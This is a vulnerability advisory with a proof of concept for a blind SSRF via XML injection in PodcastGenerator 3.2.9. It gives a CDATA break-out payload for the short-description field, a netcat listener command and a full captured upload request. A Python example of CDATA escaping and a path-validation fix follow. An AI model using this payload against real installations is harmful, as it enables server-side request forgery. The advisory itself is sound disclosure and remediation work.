
PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

# Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
# Application: PodcastGenerator
# Version: v3.2.9
# Bugs: Blind SSRF via XML injection
# Technology: PHP
# Vendor URL: https://podcastgenerator.net/
# Software Link: https://github.com/podcastgenerator/podcastGenerator
# Date of study: 01-07-2023
# Author: Mirabbas Ağalarov
# Tested On: Linux

2. Technical Details & PoC
====================================================
Steps:
1. Go to "Upload New Episode" (http://localhost/podcastGenerator/admin/episodes_upload.php).
2. Fill in all fields, and set the short description field to the payload below. The episode record stores this field inside a CDATA section; the leading "]]>" closes that section and the element so the remainder is parsed as markup, and the trailing "<![CDATA[test" reopens them so the file stays well-formed.
PAYLOAD: test]]></shortdescPG><imgPG path="http://localhost:3132/"></imgPG><shortdescPG><![CDATA[test
By the way, I use localhost here. If you have a domain, you can use the domain instead.
3. Upload the episode.
4. I listen on port 3132 because I want to observe the incoming request:
nc -lvp 3132
5. I receive the request.
Request:
POST /podcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryprutcua48pmeci6q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/podcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-07-01_2023-07-07-01_4_PHOTO-1575936123452-B67C3203203C357_1_(2).jpeg"
Content-Type: image/jpeg

image content blaaahblahasdfjblaaah; sdfblaaahasdf
Asdfasdfaddddblaaahdblaaahddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddblaaahdddddddddblaaahdblaaahdblaaahddblaaahddblaaahdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddd dddddddd dddddddd
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="shortdesc"

]]></shortdescPG><imgPG path="http://localhost:3132/"></imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="date"

2023-07-01
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="time"

17:02
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="longdesc"

test
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="episodenum"

33
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="seasonnum"

33
------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="itunesKeywords"

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="explicit"

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="authorname"

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="authoremail"

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="customtags"

------WebKitFormBoundaryprutcua48pmeci6q
Content-Disposition: form-data; name="token"

VDZM0JC75ULMHV7OVXEW8DAWH5MNWSPZ
------WebKitFormBoundaryprutcua48pmeci6q--
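The root cause is a user-controlled field concatenated straight into a CDATA section of the episode record. The following Python is an added example, not PodcastGenerator's code: a hypothetical writer in both its naive and CDATA-escaped forms, parsed back to show that the naive form yields an extra imgPG element carrying the injected path while the escaped form keeps the whole input as inert text. The element names follow the layout implied by the payload above; the sample field value and the local cover path are constructed.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample: the CDATA break-out shape from the advisory, pointing at
# a listener on localhost (port is the advisory's own placeholder).
INJECTED_SHORTDESC = (
    'test]]></shortdescPG><imgPG path="http://localhost:3132/"></imgPG>'
    '<shortdescPG><![CDATA[test'
)


def escape_cdata(text: str) -> str:
    """Make untrusted text safe inside a CDATA section.

    CDATA has exactly one terminator, "]]>", so the only way out of the
    section is to split it: close after "]]", then reopen before ">".
    The parser reassembles the original characters as plain text.
    """
    return text.replace("]]>", "]]]]><![CDATA[>")


def build_episode_xml(shortdesc: str, cover_path: str, safe: bool) -> str:
    """Hypothetical episode-record writer (not the project's code).

    safe=False concatenates the raw field the way a vulnerable writer would;
    safe=True passes it through escape_cdata first. cover_path is a
    server-chosen local path here, so it is not escaped in this example.
    """
    field = escape_cdata(shortdesc) if safe else shortdesc
    return (
        "<PodcastGenerator><episode>"
        f"<shortdescPG><![CDATA[{field}]]></shortdescPG>"
        f'<imgPG path="{cover_path}"></imgPG>'
        "</episode></PodcastGenerator>"
    )


def parse_episode(xml_text: str) -> Tuple[List[str], List[str]]:
    """Return (short descriptions, imgPG paths) as a consumer would see them.

    Any imgPG path that is not a local image file is the value the feed
    code would later fetch, i.e. the SSRF sink to watch for.
    """
    root = ET.fromstring(xml_text)
    descs = [e.text or "" for e in root.iter("shortdescPG")]
    paths = [e.get("path", "") for e in root.iter("imgPG")]
    return descs, paths
```

Beyond escaping at write time, the consumer that resolves imgPG should reject any path that is not a file under the local images directory before attempting a fetch; that check blocks the blind request even if an already-poisoned record exists on disk.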